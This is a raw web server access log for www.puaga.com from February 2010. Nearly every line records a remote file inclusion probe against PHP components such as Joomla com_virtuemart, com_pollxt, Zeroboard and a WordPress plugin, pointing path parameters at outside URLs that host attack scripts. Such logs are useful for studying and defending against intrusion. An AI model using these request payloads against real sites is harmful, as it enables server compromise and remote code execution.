220.73.144.196 - - [19/Feb/2010:08:39:32 -0800] "GET /components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:39:32 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:39:32 -0800] "GET /logs/access_100123.log//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:39:36 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:42:12 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:42:12 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:42:12 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:42:40 -0800] "GET /logs/access_100123.log//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:42:40 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:42:40 -0800] "GET /components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [19/Feb/2010:08:43:20 -0800] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.godsnews.com/images/test.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
74.50.85.229 - - [19/Feb/2010:08:43:20 -0800] "GET /components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.godsnews.com/images/test.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:09 -0800] "GET /skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:09 -0800] "GET /logs/access_100117.log%20%20//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:09 -0800] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:17 -0800] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:17 -0800] "GET /skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:08:44:17 -0800] "GET /logs/access_100117.log%20%20//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:44:30 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:44:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:44:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:44:51 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:46:31 -0800] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:46:31 -0800] "GET /logs/access_100122.log//components/com_sef/sef.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:46:31 -0800] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:08:47:39 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:08:47:39 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:08:47:40 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:08:47:49 -0800] "GET /logs/access_100208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:47:50 -0800] "GET /logs/access_100204.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:48:31 -0800] "GET /logs/access_100206.log//download.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:48:31 -0800] "GET /logs//download.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:48:31 -0800] "GET /download.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:49:12 -0800] "GET /logs/access_100209.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:50:33 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:50:42 -0800] "GET /components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:50:42 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:50:42 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:50:52 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:50:52 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:50:53 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:51:46 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:51:46 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:51:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:52:01 -0800] "GET /logs//index.php?option=com_frontpage//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:52:01 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:52:01 -0800] "GET /index.php?option=com_frontpage//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:52:13 -0800] "GET /logs/access_100128.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:52:22 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:52:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:52:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:56:44 -0800] "GET /logs/access_100121.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:58:44 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:58:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:58:44 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:58:57 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:59:18 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:59:18 -0800] "GET /components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:59:18 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:59:29 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:59:30 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:59:30 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:08:59:49 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:00:20 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:00:20 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:00:20 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:00:23 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:03:23 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:03:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:03:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:03:44 -0800] "GET /logs/access_100114.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:04:01 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:05:09 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:05:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:05:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:05:36 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:29 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:32 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:06:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:09:06:43 -0800] "GET /logs/access_100121.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:07:09 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:07:09 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:07:09 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:20 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:51 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:07:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:08:18 -0800] "GET /logs/access_100124.log%20%20//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:09:08 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:09:08 -0800] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:09:08 -0800] "GET /logs/access_100202.log%20%20//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:09:09:12 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:09:09:12 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:09:09:12 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:10:02 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:10:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:10:10 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:09:10:18 -0800] "GET /logs/access_100121.log%20%20//bbs///////board_head.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:10:21 -0800] "GET /logs/access_100115.log%20%20//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:10:45 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:11:34 -0800] "GET /logs/access_100114.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://kortech.cn/bbs/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:13:00 -0800] "GET /logs/access_091221.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:13:00 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
